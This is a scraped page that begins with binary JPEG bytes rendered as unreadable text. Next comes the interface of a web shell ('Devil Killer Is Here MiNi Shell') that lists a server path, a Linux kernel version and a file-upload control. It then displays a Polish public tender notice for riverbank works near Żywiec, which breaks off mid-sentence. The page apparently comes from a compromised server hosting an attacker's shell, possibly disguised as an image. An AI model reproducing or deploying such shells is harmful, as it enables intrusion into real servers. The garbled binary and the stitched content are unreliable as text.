JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230908/0038876401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane na terenie Nadzoru Wodnego w Żywcu etap VII </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">krakow@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wody.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane na terenie Nadzoru Wodnego w Żywcu etap VII </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-090caba3-4e41-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00388764</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl/wp/auctions/r17624,Roboty-budowlane-na-terenie-Nadzoru-Wodnego-w-Zywcu-etap-VII.html?sid=cfe5a3faa6e6247b345b6db4d7aeb54c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy Pzp – komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod<br/>adresem: https://przetargi.wody.gov.pl/. Platforma wypełnia definicję strony internetowej postępowania, na której publikowana jest<br/>dokumentacja postępowania. Wskazany w zdaniu 1 adres strony internetowej postępowania, to adres pod którym udostępniane<br/>będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie<br/>zamówienia.<br/>2. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem przetargi.wody.gov.pl w<br/>zakładce: Instrukcja dla Wykonawców. Regulamin dostępny jest w zakładce „Regulamin”. Korzystanie z Platformy oznacza<br/>akceptację regulaminu oraz Instrukcji.<br/>3. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Celem skomunikowania się z<br/>Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, których sposób<br/>złożenia został opisany w pkt 14.1 – 14.6 specyfikacji warunków zamówienia, zwanej dalej „SWZ”), Wykonawca korzysta z zakładki<br/>„Zapytaj” (na etapie składania ofert) lub „Wiadomości” (po otwarciu ofert). Zakładki te służą również Zamawiającemu do komunikacji<br/>z Wykonawcami.<br/>2. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych<br/>razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>3. Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do Rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, niemniej jednak Zamawiający rekomenduje<br/>sporządzenie korespondencji w następujących formatach: .doc., .docx, .rtf, .pdf, .xls.<br/>4. Zamawiający informuje, że adres e-mail: Marzena.Pomorska@wody.gov.pl służy jedynie do przesyłania ogłoszeń i otrzymywania<br/>informacji zwrotnej z Biuletynu Zamówień Publicznych oraz zwrotu wadiów wniesionych w formie niepieniężnej. Ewentualne<br/>wykorzystanie poczty elektronicznej w innych celach, niż wskazane w zdaniu 1, może nastąpić jedynie w przypadku awarii<br/>Platformy, przy czym - bez względu na przyczynę - poczta elektroniczna nie może służyć do złożenia oferty.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>6. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę<br/>za pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>7. Osobą uprawnioną do kontaktu z Wykonawcami jest Krzysztof Madej. Kontakt odbywa się za pośrednictwem Platformy.<br/>8. Postępowanie o udzielenie zamówienia jest prowadzone w języku polskim</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy<br/>ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail: iod@wody.gov.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego oznaczonego numerem postępowania KR.ROZ.2810.10.2022 prowadzonym na podstawie<br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia a<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Państwu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KR.ROZ.2710.122.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na remoncie ubezpieczeń brzegowych <br/>potoku Czerna w km 7+825-7+920. Na wskazanym odcinku potoku erozja boczna wód potoku powoduje podmywanie skarp brzegowych oraz porastającej roślinności drzewiastej stwarzając zagrożenie dla infrastruktury drogowej oraz mienia.<br/>Planowane przedsięwzięcie zlokalizowane jest w otulinie Parku Krajobrazowego Beskidu Żywieckiego,<br/>tj. w zakresie obszaru ochronnego znajdującego się wokół chronionego przyrodniczo terenu parku - poza formami przyrody, o których mowa w art. 6 ust. 1 pkt. 1-5 i 7-9 ustawy o ochronie przyrody. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1 Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2 R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/>najniższa cena brutto<br/>C = ---------------------------------------------- x 100 x 0,8<br/>cena brutto badanej oferty<br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R”<br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji<br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje<br/>minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli<br/>Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca<br/>punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt.<br/>UWAGA:<br/>a. Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji<br/>w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b. MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez<br/>Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1<br/>pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu<br/>ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i<br/>gwarancji jakości tj. 36 miesięcy.<br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje<br/>okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy.<br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5 Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki.<br/>15.6 Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów.<br/>15.7 W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający<br/>wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na zasypie wyrw brzegowych materiałem miejscowym pochodzącym z udrożnienia, wykonaniu zasypu z kamienia oraz naprawie istniejącego ubezpieczenia. <br/>Planowane przedsięwzięcie zlokalizowane jest w otulinie Żywieckiego Parku Krajobrazowego,<br/>tj. w zakresie obszaru ochronnego znajdującego się wokół chronionego przyrodniczo terenu parku - poza formami przyrody, o których mowa w art. 6 ust. 1 pkt. 1-5 i 7-9 ustawy o ochronie przyrody. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1 Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2 R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/>najniższa cena brutto<br/>C = ---------------------------------------------- x 100 x 0,8<br/>cena brutto badanej oferty<br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R”<br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji<br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje<br/>minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli<br/>Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca<br/>punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt.<br/>UWAGA:<br/>a. Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji<br/>w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b. MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez<br/>Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1<br/>pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu<br/>ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i<br/>gwarancji jakości tj. 36 miesięcy.<br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje<br/>okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy.<br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5 Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki.<br/>15.6 Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów.<br/>15.7 W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający<br/>wezwie 